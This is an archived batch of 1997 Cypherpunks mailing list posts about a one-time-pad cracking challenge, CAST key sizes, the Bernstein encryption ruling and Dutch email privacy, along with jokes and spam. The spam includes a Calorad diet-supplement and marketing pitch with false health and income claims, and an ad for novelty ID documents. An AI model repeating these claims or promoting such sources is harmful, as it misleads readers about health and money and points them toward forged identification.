From 18205549 at aol.com Mon Aug 25 12:57:59 1997 From: 18205549 at aol.com (18205549 at aol.com) Date: Mon, 25 Aug 1997 12:57:59 -0700 (PDT) Subject: Do You Like What You See In The Mirror ? Message-ID: <>
                                 DO YOU LIKE WHAT YOU SEE
                                        IN THE MIRROR?

                                HAVE THINGS GONE SOUTH?
                               DO YOU HAVE SAGGING SKIN?
                                IS GRAVITY TAKING IT'S TOLL?

                       INTRODUCING

                                  CALORAD(R)

 Now available in the U.S. for the first time!
 It Literally Melts Fat and Rebuilds Connective
 Tissue WHILE YOU SLEEP!  NO KIDDING!!

 10 Year Proven Track Record - 86% Success Rate
 Medical Test Results are coming in from all over the Country
 Health Practitioners are endorsing this product
 by the thousands!

                               Cholestrol Levels are down!
             Triglycerides down!                       Blood Pressure down!
                                          Pain is leaving!

 Muscle is rebuilding while bodies are RESHAPING!
 Body Builders, Athletes, World Champions and
 Professional Trainers are endorsing this product!
 INCHES AND WEIGHT MELT OFF WHILE YOU SLEEP!

             100% SAFE - 100% NATURAL

 Absolutely no SIDE EFFECTS, STIMULANTS OR DRUGS!
 Good for teenagers and adults alike!
 (No pregnant or lactating women)

 INCREDIBLE $$$$$$$$$ OPPORTUNITY AVAILABLE!
 Exclusive International Marketing Rights!
 England & Australia opening soon!

 My upline is ordering 52,000 bottles each week!
 We will help build your unlimited downline!  Not MLM!
 You can reduplicate yourself up to 99 times!

 Many are earning $1750+ first week! (possible up to 99x!!!)
 Company has only been officially launched since April 1997
 Unprecedented $6.1 million in 1st month!

                  Follow These $imple $teps To $uccess:
 
     For More info:
 
 E~mail Assistance  or 

           Call :
 
 941 - 923 - 8085

 ~~~~~~~~~~~~~~
 Remove Here !  Put "Remove" in Subject !












































From ad at noveltyi.com Mon Aug 25 14:28:45 1997 From: ad at noveltyi.com (ad at noveltyi.com) Date: Mon, 25 Aug 1997 14:28:45 -0700 (PDT) Subject: Noveltyid.com for all your Novelty ID needs Message-ID: <97Aug25.165142-0400_edt.337563-1343+4378@mail.bc.rogers.wave.ca> Looking for Identification? Check out http://www.noveltyid.com From webmaster at innerbody.com Mon Aug 25 14:32:54 1997 From: webmaster at innerbody.com (Kevin Keil) Date: Mon, 25 Aug 1997 14:32:54 -0700 (PDT) Subject: New Free Educational Sites Message-ID: Just a brief note to let you know about two new educational sites that are interactive and intended for non-technical audiences. I thought you might be interested in these new programs. Human Anatomy On-line covers the subject of the anatomy and Automotive Learning On-line covers the subject of automobiles. They include hundreds of graphics, educational information and animations. These two programs are free to the Internet community. This is a great resource that delivers educational material for schoolchildren to adults. I hope that you will find them to be of high quality and educational. Thank you for your time. Human Anatomy On-line is located at http://www.innerbody.com Automotive Learning On-line is located at http://www.innerauto.com Kevin Keil Webmaster Informative Graphics Corp Webmaster at innerbody.com NOTE: This address was located on a web page and used to notify you of this information. I will not be contacting you again unless requested. From remailer at bureau42.ml.org Mon Aug 25 00:47:05 1997 From: remailer at bureau42.ml.org (bureau42 Anonymous Remailer) Date: Mon, 25 Aug 1997 15:47:05 +0800 Subject: Top 10 Ways to Make a Grouchy Old CypherPunk Smile - #9 Message-ID: Top 10 Ways to Make a Grouchy Old CypherPunk Smile -------------------------------------------------- #10) Find his shoes for him. #9) Buy Kent Crispin a Dr. Kevorkian gift-certificate. #8) #7) #6) #5) #4) #3) #2) #1) [This space reserved for T.C. May] From nobody at replay.com Mon Aug 25 01:00:24 1997 From: nobody at replay.com (Name Withheld by Request) Date: Mon, 25 Aug 1997 16:00:24 +0800 Subject: unruly cult members Message-ID: <199708250745.JAA08647@basement.replay.com> Would cult members kindly stop bickering and straying from the party line? All this argument questioning sacred dogma is anti-cypherpunk, and clearly bought on by failure to recite the daily mantra: "Krispin-hare-hare-krispin government is evil Krispin-hare-hare-krispin nuke washington DC Krispin-hare-hare-krispin gun down graffiti kids Krispin-hare-hare-krispin sterelize the proles" You're becoming so unpredictable, this is sacrilege, cult members are supposed to unquestioningly follow sacred dogma. Hare-Krispin From Michael.Johnson at mejl.com Mon Aug 25 01:18:40 1997 From: Michael.Johnson at mejl.com (Mike) Date: Mon, 25 Aug 1997 16:18:40 +0800 Subject: $1 Million Code Crack In-Reply-To: <1.5.4.32.19970822143251.0072f110@pop.pipeline.com> Message-ID: <3.0.3.32.19970825095304.00971960@localhost> John Young wrote: > Mr. Neeley admits his integrity is on the line. "If I'm > wrong," he notes, "we're out of business." It looks like they're out of business already. I tried to mail their technical support but the mail bounced. The web page says that when you buy the software you get two OTP's in the package. There is not a single word on how to get any more OTP's, how they are created or distributed. Since you need a unique OTP for every party you wish to communicate with, the OTP distribution should be a major part of the product. Yet, they don't even mention it! Mike. From tcmay at got.net Mon Aug 25 01:22:43 1997 From: tcmay at got.net (Tim May) Date: Mon, 25 Aug 1997 16:22:43 +0800 Subject: List Subscriptions / Re: Prior Restraint on Publishers In-Reply-To: Message-ID: At 9:04 PM -0700 8/24/97, Anonymous wrote: >Tim May wrote: >> By the way, which list address are you now subscribed to...I switched from >> algebra. com to cyberpass.net, but now expect to see 2-3 hours delay before >> posts appear. >> >> (This applies to others, too. I'm getting replies to my posts, when sent >> directly to me, literally hours before seeing it on the list. Someone >> mentioned subscribing to toad.com, which, to tell the truth, I thought had >> vanished as a list origination site months ago.) > >If you subscribe to cypherpunks-unedited at toad.com you will get almost >immediate receipt of toad.com posts much of the day. Algebra.com is >generally only a short time lag behind, although this varies (and you >get duplicates of the toad.com posts). >The advantage of toad.com is that it gives you feedback as to the >time-lag of the distributed lists. The advantages of the distributed >lists is that you can change among them if one is temporarily having >problems. Ah, so when I send my messages to "cypherpunks at algebra.com" they come back more quickly from toad.com? Somehow I doubt this. I've been sending nearly all of my posts to either the algebra.com or the cyberpass.net addresses, and the toad.com address is set to expire, or so John told us when he gave us a deadline for finding another site. I've mentioned this a couple of times, and yet some of you seem to think the toad.com address is the preferred, fastest one. Would some of the operators of the distributed lists comment on the time delays, on the topology of the interlinked distributed list, and on what role, if any, toad.com continues to play in the process? Igor, Lance, Jim, John? Posts like this one from Anonymous, while perhaps accurate (or perhaps not, I really don't know) are not as convincing as words straight from those involved. --Tim May There's something wrong when I'm a felon under an increasing number of laws. Only one response to the key grabbers is warranted: "Death to Tyrants!" ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1398269 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From OrangeJoe at aol.com Mon Aug 25 01:29:07 1997 From: OrangeJoe at aol.com (OrangeJoe at aol.com) Date: Mon, 25 Aug 1997 16:29:07 +0800 Subject: Informative web sites? Message-ID: <970825033039_656175381@emout12.mail.aol.com> Do U have any good web sites that can give me information about people and companies that they would NOT like us to get? I do Private investigations. I can get most anything I need, but it cost too much money. I know that there are sites that I should be able to get to that I can get information for free and direct from the government. Thanks Joe OrangeJoe at aol.com From Andrew at mail.demon.net Mon Aug 25 16:53:04 1997 From: Andrew at mail.demon.net (Andrew at mail.demon.net) Date: Mon, 25 Aug 1997 16:53:04 -0700 (PDT) Subject: Economics Quest Message-ID: <> Hi, My name is Andrew, I'm 15, I live in the UK and I'm studing economics at standard grade level. Can you please spare a few minutes of your valuable time to answer my questionaire @ http://www.alexanderhomes.demon.co.uk/economics/personal.html I have constructed it as part of my standard grade course work, so I'm relying on your co-operation! ;-) thanks in advance Andrew From Andrew at mail.demon.net Mon Aug 25 16:53:04 1997 From: Andrew at mail.demon.net (Andrew at mail.demon.net) Date: Mon, 25 Aug 1997 16:53:04 -0700 (PDT) Subject: Economics Quest Message-ID: <> Hi, My name is Andrew, I'm 15, I live in the UK and I'm studing economics at standard grade level. Can you please spare a few minutes of your valuable time to answer my questionaire @ http://www.alexanderhomes.demon.co.uk/economics/personal.html I have constructed it as part of my standard grade course work, so I'm relying on your co-operation! ;-) thanks in advance Andrew From nobody at REPLAY.COM Mon Aug 25 02:20:53 1997 From: nobody at REPLAY.COM (Anonymous) Date: Mon, 25 Aug 1997 17:20:53 +0800 Subject: $1 Million Code Crack Message-ID: <199708250903.LAA16064@basement.replay.com> Onn Fri, 22 Aug 1997, John Young apparently forwarded from: "$treet Journal, August 22, 1997, p. A7A.": > On the bright side, cryptologists agree that the > decades-old encryption method that Crypto-Logic is claiming > to use -- called a "one-time pad" -- is theoretically > unbreakable. Each "pad" has a set of uniquely random > digital symbols that are coded to the actual message. The > recipient uses the same symbols to decrypt the message. The > pads are used only once. ROTFL. (Well, not literally, but smiling.) The "How it works" link on their site is broken :-), so what they're basically saying is "here is some encrypted text, I bet you can't crack it." ----- UP -----??daU?????dr1wEFssYNOgvLDiCyZ296C51VPUo9Mi0BIHMnZTSveVPXb?02G 47ECGIA2UoZgy0Kl!?91zW9SqF05kDlR!fYDPbbP9hH8J0CDLDrFfO3N7CxVur?QJ o22aPgHyUmFpdbg7G!iQSZaHAOELipdS?m7KzGmxylN!kd2otaKISSRilW5HV00221 !jRTYbYOsb9fFpzbxRGeUjvozbviGE00rO?UdhzQ04aPV9ZoB0eJl0o6gA3YJuivVPPyr V6jF3dYhDEba9o4oO1oDaGxRoKEhNEPtGm4UxWxCriUcUEsJRfb7bIXhdwMcW5g CHd7ezbbXO4KD3IWPa67EgoMg42aiRiVtIuhu!So!dRW8lMVOhHx68Co?TPAm7dq dGiGcv1lVheiwX3fpxxy3rMIMpEV-q3s9OF----- End ----- Idiots. Saying that one-time pads are secure is meaningless. Their web site doesn't even mention key exchange. As the Preface to Advanced Cryptography (www.counterpane.com) says, % If I take a letter, lock it in a safe, hide the safe somewhere in % New York, and then tell you to read the letter, that's not % security. That's obscurity. On the other hand, if I take a letter % and lock it in a safe, and then give you the safe along with the % design specifications of the safe and a hundred identical safes with % their combinations so that you and the world's best safecrackers can % study the locking mechanism--and you still can't open the safe and % read the letter, that's security. I'm sure everybody here already knew this, but anybody with a million bucks and no clues at all deserves to be kicked. > "Anyone who says their system is > bulletproof is either a liar or stupid," says Winn > Schwartau, a Largo, Fla., security expert. I must disagree... they could be a liar _and_ stupid. > Mr. Neeley admits his integrity is on the line. "If I'm > wrong," he notes, "we're out of business." Somebody ought to forward this thread to his creditors... ::Boots From hvdl at sequent.com Mon Aug 25 02:40:55 1997 From: hvdl at sequent.com (Unicorn) Date: Mon, 25 Aug 1997 17:40:55 +0800 Subject: CAST key size Message-ID: <19970825111908.55815@sequent.com> Hi Guys, Just a quick question on the keysize of the CAST algorithm. According to the bible of Bruce, CAST uses a 64 bit keysize, while in the manual of PGP 5.0 (page 89), Phill states that CAST uses a 128 bit keysize... Am I missing something? Ciao, Unicorn. -- ======= _ __,;;;/ TimeWaster on http://www.IAEhv.nl/users/hvdl ============== ,;( )_, )~\| Hans "Unicorn" Van de Looy PGP: 64 07 5D 4C 3F 81 22 73 ;; // `--; GSM: +31 653 261 368 52 9D 87 08 51 AA 35 F0 ==='= ;\ = | ==== Youth is not a time in life, it's a State of Mind! ======== -------------- next part -------------- A non-text attachment was scrubbed... Name: pgp00005.pgp Type: application/octet-stream Size: 462 bytes Desc: "PGP signature" URL: From mixmaster at as-node.jena.thur.de Mon Aug 25 03:40:34 1997 From: mixmaster at as-node.jena.thur.de (Jenaer Mixmaster Anonserver) Date: Mon, 25 Aug 1997 18:40:34 +0800 Subject: Socio-Economic Cults (Re: Cypherpunk Cults) Message-ID: ? the Platypus {aka David Formosa} wrote: >I have always found such arms races pointless and unproductive. Now >instead of paying a small amount of money to the goverment you have to pay >a massive amount of money for a securaty system. Big thing with video >camers, motion sensors and plungomatic securaty gards. Uh, don't you mean "instead of paying a large amount of money to the government and a small amount of money for a security system, you now just pay a small amount of money for the security system"? Or do you live in a different reality to the rest of us, whose cops are so fuck-awful that we have to both pay their wages and the obscene costs of our corrupt legal system, then pay extra to actually protect ourselves? Guns and cameras are cheap compared to paying donut-hogs to examine rectums with plungers. CopPlunger From manager at musicblvd.com Mon Aug 25 18:51:56 1997 From: manager at musicblvd.com (manager at musicblvd.com) Date: Mon, 25 Aug 1997 18:51:56 -0700 (PDT) Subject: Music Boulevard 2nd Anniversary News Flash Message-ID: <199708260150.VAA01583@riker.telebase.com> THE MUSIC BOULEVARD NEWS FLASH Help us celebrate Music Boulevard's second anniversary this month! It's time for us to say thank you to the thousands of music fans who have helped turn Music Boulevard into the leading online music store. Come to: http://www.musicblvd.com and join in on the fun! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ FREE SHIPPING ! Buy all the albums you want -- the shipping charges are on us! In celebration of Music Boulevard's Second Anniversary, we're offering free shipping for U.S. orders! (Sorry, this special offer does not apply to international orders, upgraded shipping options, or FedEx Next Day shipping.) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ MUSIC BOULEVARD ANNIVERSARY SAMPLER GIVEAWAY We've produced a great Music Boulevard Anniversary sampler CD. And you can get one free, with any Music Boulevard order. Featuring 10 tracks, with something for every musical taste, the sampler is only available on Music Boulevard. Check it out here: http://mb1.musicblvd.com/cgi-bin/tw/0_0_/mb2/live/mrkt/n2ksampler.txt ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HUNDREDS OF DOUBLE CD'S ON SALE! We put hundreds of 2-CD sets on sale, and they are all under $20! (Some as low as $11.99). There are great titles in every genre. http://mb1.musicblvd.com/cgi-bin/tw/0_0_/mb2/live/mrkt/doublcds.txt ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ IMPORTS ARE HERE! We've just added 18,000 new import titles to our already incredible selection. You'll find imports on the discographies of almost all of your favorite artists (like the Smashing Pumpkins' "The End is the Beginning", http://mb1.musicblvd.com/cgi-bin/tw/0_43_433910). Or, just browse 'em all! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE FUTURE OF MUSIC IS e_mod! Did you know that you can download singles by top artists? Well, you can, using e_mod from Music Boulevard. Most tracks are only $.99! (http://www.musicblvd.com/emod) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ GREAT FEATURES Plus all the of the great features you can find every day: sound samples, album art, record reviews, new releases on sale, advance orders, music news, and much more. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ QUESTIONS, QUESTIONS Forgot your user name or password? Can't figure out emod? Just contact our Customer Service staff (mailto:service at musicblvd.com), and they'll be happy to help. Comments, questions, and kudos always welcome. Direct them at me, mailto:manager at musicblvd.com And, if you don't want any more of these emails, just reply to this message, and we'll remove you from the list! A reminder, this email is sent to Music Boulevard account holders to inform them about new happenings on the site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THANKS FOR SHOPPING ON MUSIC BOULEVARD! http://www.musicblvd.com From Michael.Johnson at mejl.com Mon Aug 25 04:23:18 1997 From: Michael.Johnson at mejl.com (Mike) Date: Mon, 25 Aug 1997 19:23:18 +0800 Subject: $1 Million Code Crack In-Reply-To: <199708250903.LAA16064@basement.replay.com> Message-ID: <3.0.3.32.19970825130151.00902e40@localhost> Anonymous wrote: >ROTFL. (Well, not literally, but smiling.) The "How it works" link on >their site is broken :-), so what they're basically saying is "here is >some encrypted text, I bet you can't crack it." The link page isn't entirely broken, they just forgot to add a link to it :-) If you open up you can see all their pages. Most of it isn't finished yet (just look at so they probably shouldn't have enabled browsing by directory... Mike. From assar at sics.se Mon Aug 25 04:32:01 1997 From: assar at sics.se (Assar Westerlund) Date: Mon, 25 Aug 1997 19:32:01 +0800 Subject: CAST key size In-Reply-To: <19970825111908.55815@sequent.com> Message-ID: <5l67su1pm4.fsf@assaris.sics.se> Unicorn writes: > Just a quick question on the keysize of the CAST algorithm. According to > the bible of Bruce, CAST uses a 64 bit keysize, while in the manual of > PGP 5.0 (page 89), Phill states that CAST uses a 128 bit keysize... CAST-128 allows key sizes of 40, 48, ..., 128 bits. /assar From declan at well.com Mon Aug 25 19:40:01 1997 From: declan at well.com (Declan McCullagh) Date: Mon, 25 Aug 1997 19:40:01 -0700 (PDT) Subject: Commerce Department encryption rules declared unconstitutional Message-ID: ---------- Forwarded message ---------- Date: Mon, 25 Aug 1997 19:39:35 -0700 (PDT) From: Declan McCullagh To: fight-censorship-announce at vorlon.mit.edu Subject: Commerce Department encryption rules declared unconstitutional A Federal judge in San Francisco ruled today that the Commerce Department's export controls on encryption products violate the First Amendment's guarantees of freedom of speech. In a 35-page decision, U.S. District Judge Marilyn Patel said the Clinton administration's rules violate "the First Amendment on the grounds of prior restraint and are, therefore, unconstitutional." Patel reaffirmed her December 1996 decision against the State Department regulations, saying that the newer Commerce Department rules suffer from similar constitutional infirmities. Patel barred the government from "threatening, detaining, prosecuting, discouraging, or otherwise interfering with" anyone "who uses, discusses, or publishes or seeks to use, discuss or publish plaintiff's encryption programs and related materials." Daniel Bernstein, now a math professor at the University of Illinois, filed the lawsuit with the help of the Electronic Frontier Foundation. Patel dismissed the State, Energy, and Justice departments and CIA as defendants. President Clinton transferred jurisdiction over encryption exports from the State to the Commerce department on December 30, 1996. The Justice Department seems likely to appeal the ruling to the Ninth Circuit, which could rule on the case in the near future. -Declan More info: http://www.eff.org/pub/Legal/Cases/Bernstein_v_DoS/Legal/970825_decision.images/page-images.html From anon at anon.efga.org Mon Aug 25 19:53:41 1997 From: anon at anon.efga.org (Anonymous) Date: Mon, 25 Aug 1997 19:53:41 -0700 (PDT) Subject: Economics Quest Message-ID: Andrew at mail.demon.net wrote: > > Hi, My name is Andrew, I'm 15, I live in the UK and I'm studing economics > at standard grade level. Can you please spare a few minutes of your valuable > time to answer my questionaire @ > http://www.alexanderhomes.demon.co.uk/economics/personal.html > I have constructed it as part of my standard grade course work, so I'm relying on > your co-operation! ;-) Andrew, I wouldn't worry too much about getting good grades in your standard grade economics class. After all, your questionaire looks so much like a professionally produced one that I am sure you don't need my help to pass your class. However, I will answer your questions, just the same. ******************************* In which country do you live? # The one outside of the city. How long have you had access to the Internet? # I logged on about ten minutes ago. Are you influenced by online advertisement? No Yes # Yo! What age are you? # Age of Aquarius. Please specify your income range # $ 0.00 --> $ 0.37 Have you ever purchased a service over the Internet? No Yes # Nes! Have you ever purchased a good over the internet? No Yes # Yoe! If so Please specify the average price range of the good(s) you have bought over the Internet # $ 1,347,879,992.17 How often do you buy goods over the Internet? # Never always. Do you have any security worries about purchasing a good over the Internet? No Yes # Why do you ask? Which of the following items do you find most important when buying goods over the Internet? Delivery time Price Quality of service # X Free XXXX Pictures what type of good/service would you be willing to actually buy via the Internet? Computer Software Computer Hardware Household Durables Office Products Stocks/Mutual Funds/Bonds Airline Tickets Catalog Goods Boutique Clothing Household Bills Shipping Special Internet Services Music/Video Entertainment Other # MLM Opportunities What is the biggest limiting factor stopping you from buying more on the Internet? Delivery time Goods offered cost of delivery Security Price other, please state # Imprisonment for fraud. From nobody at REPLAY.COM Mon Aug 25 05:06:20 1997 From: nobody at REPLAY.COM (Anonymous) Date: Mon, 25 Aug 1997 20:06:20 +0800 Subject: And they're all CypherPunks... Message-ID: <199708251146.NAA01075@basement.replay.com> Q. You said cows hate spinach, barn owls snore, and spiders can't chew. But have you forgotten female goats have beards? A. Quite so. Do remember, though, elephants get flat feet, moths hear through their hair, and starfish have no brains. I also vividly recall that yaks give pink milk. ============================================== LMBoyd Web Site / U. S. Newspapers / Start Email / Stop Email http://www.LMBoyd.com/postscript.htm From mixmaster at remail.obscura.com Mon Aug 25 05:25:14 1997 From: mixmaster at remail.obscura.com (Mix) Date: Mon, 25 Aug 1997 20:25:14 +0800 Subject: No Subject Message-ID: <199708251151.EAA11621@sirius.infonex.com> The optional penis smiled as the blue arc-phase crossed the scamper gap. There were many of us who felt gloved by the discharge, as if irradiated with baby milk powder. Later, the arc-monster cried quietly in the humming chair, whilst remaining still enough for the scamper gloves to plunge authoritatively. - A'Tak A'Tdorn From rah at shipwright.com Mon Aug 25 05:28:29 1997 From: rah at shipwright.com (Robert Hettinga) Date: Mon, 25 Aug 1997 20:28:29 +0800 Subject: Child Porn In-Reply-To: <19970825021444.13392.qmail@nym.alias.net> Message-ID: At 10:14 pm -0400 on 8/24/97, Feanor wrote: > BTW, does anyone have a good writeup on the 4 horsemen of the infocalypse > concept? Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com), Philodox e$, 44 Farquhar Street, Boston, MA 02131 USA "... however it may deserve respect for its usefulness and antiquity, [predicting the end of the world] has not been found agreeable to experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire' The e$ Home Page: http://www.shipwright.com/ From anon at anon.efga.org Mon Aug 25 20:34:12 1997 From: anon at anon.efga.org (Anonymous) Date: Mon, 25 Aug 1997 20:34:12 -0700 (PDT) Subject: Open the Floodgates / Re: Commerce Department encryption rules declared unconstitutional Message-ID: <6e8e91b302438871285ea3ba25cf4840@anon.efga.org> Declan McCullagh wrote: > Patel barred the government from "threatening, detaining, > prosecuting, discouraging, or otherwise interfering with" anyone > "who uses, discusses, or publishes or seeks to use, discuss or > publish plaintiff's encryption programs and related materials." Related materials such as PGP Source Code? From jya at pipeline.com Mon Aug 25 05:36:07 1997 From: jya at pipeline.com (John Young) Date: Mon, 25 Aug 1997 20:36:07 +0800 Subject: BXA Meet in Portland OR Message-ID: <1.5.4.32.19970825121003.00712010@pop.pipeline.com> Any chance someone NW can attend this and report? Federal Register: August 25, 1997 (Volume 62, Number 164) ----------------------------------------------------------------------- DEPARTMENT OF COMMERCE Bureau of Export Administration Regulations and Procedures Technical Advisory Committee; Notice of Open Meeting A meeting of the Regulations and Procedures Technical Advisory Committee will be held September 23, 1997, 9:00 a.m., in the Plaza Room of the Portland World Trade Center, 25 S.W. Salmon, Portland, Oregon. The Committee advises the Office of the Assistant Secretary for Export Administration on implementation of the Export Administration Regulations (EAR) and provides for continuing review to update the EAR as needed. Agenda 1. Opening remarks by the Chairwoman. 2. Presentation of papers or comments by the public. 3. Update on Bureau of Export Administration initiatives: Draft encryption regulation. Status of Wassenaar Arrangement implementation regulation. Efforts to harmonize the Foreign Trade Statistics Regulations and the Export Administration Regulations in regards to the filing of Shipper's Export Declarations. 4. Discussion of European, Japanese, and U.S. export controls in regards to ``catch-all'' proliferation controls, Wassenaar Arrangement controls, encryption items, and the hiring of foreign nationals. The meeting will be open to the public and a limited number of seats will be available. To the extent time permits, members of the public may present oral statements to the Committee. Written statements may be submitted at any time before or after the meeting. However, to facilitate distribution of public presentation materials to Committee members, the Committee suggests that presenters forward the public presentation materials, two weeks prior to the meeting date, to the following address: Ms. Lee Ann Carpenter, TAC Unit/OAS-EA, MS: 3886C, Bureau of Export Administration, U.S. Department of Commerce, Washington, D.C. 20230. For further information or copies of the minutes, contact Lee Ann Carpenter on (202) 482-2583. Dated: August 19, 1997. Lee Ann Carpenter, Director, Technical Advisory Committee Unit. [FR Doc. 97-22425 Filed 8-22-97; 8:45 am] From feanor at nym.alias.net Mon Aug 25 21:03:44 1997 From: feanor at nym.alias.net (Feanor) Date: Mon, 25 Aug 1997 21:03:44 -0700 (PDT) Subject: lack of evolution (So What!) Message-ID: <19970826040334.27048.qmail@nym.alias.net> On Aug 25, 21:41, Ray Arachelian wrote: } Subject: Re: lack of evolution (So What!) > > On Mon, 25 Aug 1997, Peter Trei wrote: > > > One factor which everyone seems to be overlooking in this > > thread is the future impact of biotechnology. > > > > I see someone's been recently reading Beyond This Horizon by Heinlein. :) Sounded a lot more like Sterling/Crystal Express, the Shaper/Mechanist section, to me. -- #!/bin/perl -sp0777i On Aug 25, 15:02, Bruce Schneier wrote: } Subject: Make Money Fast > This should be fun for someone: > > > HACKERS VIE FOR $1-MILLION REWARD > Austin, Texas start-up Crypto-Logic Corp. has offered a $1-million reward to > whomever can crack its new e-mail encryption system within a year. > Cryptologists generally agree that Crypto-Logic's technology, called a > "one-time pad" is theoretically uncrackable -- each "pad" has a set of > uniquely random digital symbols that are coded to the actual message. The > recipient uses the same pad to decode the message, and each pad is used only > once. Still, experts are warning never to underestimate the tenacity of > computer hackers: "Anyone who says their system is bulletproof is either a > liar or stupid," says one. "If I'm wrong," says Crypto-Logic's VP and COO, > "we're out of business." http://www.ultimateprivacy.com I've looked at this, there are two problems: 1. The message is in [A-Za-z0-9!@#$%^&*()] ASCII. The translation scheme is undisclosed. 2. The message is, apparently, compressed to some proprietary standard. So, someone's going to have to hack disassembly to get this message into binary. Once that's done, we can start bruting it. -- #!/bin/perl -sp0777i -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Aloha, In the Dutch constitution it says that (snail) mail is personal and private. It is illegal to open mail. Except of course with the usual warrants. And there used to be a special division of the PTT (the Dutch phone/mail company) that had the right to open mail that couldn't be delivered or had other problems. These people had to take all kinds of oaths. On the whole it wasn't easy to (legally) read someone else's mail. There is currently a proposal to change the constitution(1) so that email is specifically included in this. I'll attempt a translation of the article here (the original can be found at http://www.pi.net/computer/multim/21-8-97/mm21-8-97a.html). - --- BEGIN --- Privacy of encrypted email - -------------------------- Email will be part of the 'privacy of letters' (== briefgeheim) as is written down in the constitution, if the proposal passes through parliament, and the new parliament in 1998. The government says this needs to be done as the old law is obsolete. Also, since the Dutch PTT has been privatised there is no minesterial control anymore. The two most important parts are: 1. The right to communicate privately is inalienable, except in cases described by law, by those who are appointed by law. 2. The law describes rules to protect private communications. The law seems strange when seen from a multimedia perspective. Video/images will, in principle not be protected by it, as it is neither written text or spoken word. If the video/images are meant for a limited group of people, for example when communicating through lip-reading (?), it will be protected. Faxes and unencrypted email will not be protected, as those are like postcards. Also information about the communications, like the fact that email has been sent, should not be protected according to the government. The point is that persons can communicate in private, and that this is clear. The sender will have to use encryption to indicate that secrecy is wanted, otherwise the communications will not be protected (by this law). Telephone conversations will also be private, except in the case of someone being withing earshot of it. Changes in the constitution have to be approved by to consecutive parliaments. So it will take at least a year before this proposal will have the force of law. - --- END --- Hmm... Looking back at this translation, I don't think it's very good. But it'll have to do for now. I'll post any other relevant information I find. I wonder if this will be the first constitution in the world that'll mention encryption specifically... Alex (1) To change the constitution in The Netherlands, the parliament has to vote on it, then there have to be new elections, and then the new parliament has to vote on it as well. This is to (try to) ensure that governments do not change the constitution on a whim. -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQA/AwUBNAF4N9uYAh4dUSo/EQJC2wCeNdu+LscGWu8LVHRviiTuS81kQiQAnAm5 tzI7B5+wPTI6n+Elzoag08PI =WNZ+ -----END PGP SIGNATURE----- From shamrock at netcom.com Mon Aug 25 21:37:01 1997 From: shamrock at netcom.com (Lucky Green) Date: Mon, 25 Aug 1997 21:37:01 -0700 (PDT) Subject: Open the Floodgates / Re: Commerce Department encryption rules declared unconstitutional In-Reply-To: <6e8e91b302438871285ea3ba25cf4840@anon.efga.org> Message-ID: <3.0.2.32.19970825213532.0074c480@netcom10.netcom.com> At 11:33 PM 8/25/97 -0400, Anonymous wrote: >Declan McCullagh wrote: > >> Patel barred the government from "threatening, detaining, >> prosecuting, discouraging, or otherwise interfering with" anyone >> "who uses, discusses, or publishes or seeks to use, discuss or >> publish plaintiff's encryption programs and related materials." > > Related materials such as PGP Source Code? Not even close. The ruling only covers Bernstein and his "Snuffle" source code. The ruling provides an interesting data point, but is inconsequential to the software industry. --Lucky Green PGP encrypted mail preferred. DES is dead! Please join in breaking RC5-56. http://rc5.distributed.net/ From nobody at REPLAY.COM Mon Aug 25 06:41:01 1997 From: nobody at REPLAY.COM (Anonymous) Date: Mon, 25 Aug 1997 21:41:01 +0800 Subject: Church of Cryptology Message-ID: <199708251321.PAA10163@basement.replay.com> The Church of Cryptology, established by Brother D'Shauneaux in 1919, resents the attempts of the U.S. government to criminalize our most closely held religious beliefs. Cryptography is well documented in the Bible, from the Tower of Babel to talking in tongues, and any infringement on our right to communicate in tongues constitutes religious oppression. Accordingly, the Church of Cryptology would like to acknowledge those who have suffered persecution in their efforts to spead cryptology as Saints for the Holy Cause. The Primary Religious Elected Zeus, our current leader, would like to assure all Cypherpunks that they will be granted special dispensation for any acts of Holy War they perform in the cause of strong encryption. From ravage at ssz.com Mon Aug 25 06:56:48 1997 From: ravage at ssz.com (Jim Choate) Date: Mon, 25 Aug 1997 21:56:48 +0800 Subject: List Subscriptions / Re: Prior Restraint on Publishers (fwd) Message-ID: <199708251351.IAA00012@einstein.ssz.com> Forwarded message: > Date: Mon, 25 Aug 1997 01:22:48 -0700 > From: Tim May > Subject: Re: List Subscriptions / Re: Prior Restraint on Publishers > I've been sending nearly all of my posts to either the algebra.com or the > cyberpass.net addresses, and the toad.com address is set to expire, or so > John told us when he gave us a deadline for finding another site. I've > mentioned this a couple of times, and yet some of you seem to think the > toad.com address is the preferred, fastest one. > > Would some of the operators of the distributed lists comment on the time > delays, on the topology of the interlinked distributed list, and on what > role, if any, toad.com continues to play in the process? Igor, Lance, Jim, > John? Not shure exactly how to answer this as I don't really measure it but I will pass along my experience and describe the network on this end... einstein.ssz.com is a 486DX2 80 linked via ISDN to a FDDI/T3/T1 backed up'ed link to the major SprintNet and MCI backbone here in Austin, Tx. Our typical physical latency is about 30mS 